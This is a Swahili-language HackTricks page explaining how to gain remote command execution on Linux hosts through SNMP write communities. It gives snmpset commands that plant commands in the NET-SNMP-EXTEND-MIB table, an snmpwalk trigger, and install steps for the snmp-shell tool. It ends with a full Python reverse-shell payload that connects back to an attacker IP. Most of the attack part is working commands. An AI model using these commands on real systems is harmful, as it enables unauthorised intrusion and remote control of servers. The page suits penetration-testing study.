SNMP RCE

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

SNMP RCE

SNMP inaweza kudukuliwa na mshambuliaji ikiwa msimamizi anapuuza mipangilio yake ya msingi kwenye kifaa au seva. Kwa kutumia vibaya jamii ya SNMP na ruhusa ya kuandika (rwcommunity) kwenye mfumo wa uendeshaji wa Linux, mshambuliaji anaweza kutekeleza amri kwenye seva.

Kuongeza Huduma na Amri Zaidi

Ili kuongeza huduma za SNMP na kuongeza amri zaidi, ni muhimu kuongeza safu mpya kwenye "nsExtendObjects" meza. Hii inaweza kufanikiwa kwa kutumia amri ya snmpset na kutoa vigezo muhimu, ikiwa ni pamoja na njia kamili ya kutekelezwa na amri itakayotekelezwa:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Kuweka Amri za Kutekelezwa

Kuweka amri za kutekelezwa kwenye huduma ya SNMP kunahitaji uwepo na uwezekano wa kutekelezwa kwa faili/maandishi yanayoitwa. NET-SNMP-EXTEND-MIB inahitaji kutoa njia kamili ya kutekelezwa kwa faili/maandishi.

Ili kuthibitisha utekelezaji wa amri iliyowekwa, amri ya snmpwalk inaweza kutumika kuorodhesha huduma ya SNMP. Matokeo yataonyesha amri na maelezo yake yanayohusiana, ikiwa ni pamoja na njia kamili:

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

Kuendesha Amri Zilizowekwa

Wakati amri iliyowekwa inasomwa, inatekelezwa. Tabia hii inajulikana kama run-on-read(). Utekelezaji wa amri unaweza kuonekana wakati wa kusoma snmpwalk.

Kupata Kishell cha Seva na SNMP

Ili kupata udhibiti juu ya seva na kupata kishell cha seva, skrini ya python iliyoendelezwa na mxrch inaweza kutumika kutoka https://github.com/mxrch/snmp-shell.git.

Kwa hiari, kishell cha nyuma kinaweza kuundwa kwa mkono kwa kuingiza amri maalum katika SNMP. Amri hii, inayosababishwa na snmpwalk, inaweka uhusiano wa kishell cha nyuma kwenye kompyuta ya mshambuliaji, kuruhusu udhibiti juu ya kompyuta ya mwathirika. Unaweza kufunga kabla ya mahitaji ya kuendesha hii:

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Au kwa Kiswahili: shell ya kurudisha nyuma:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated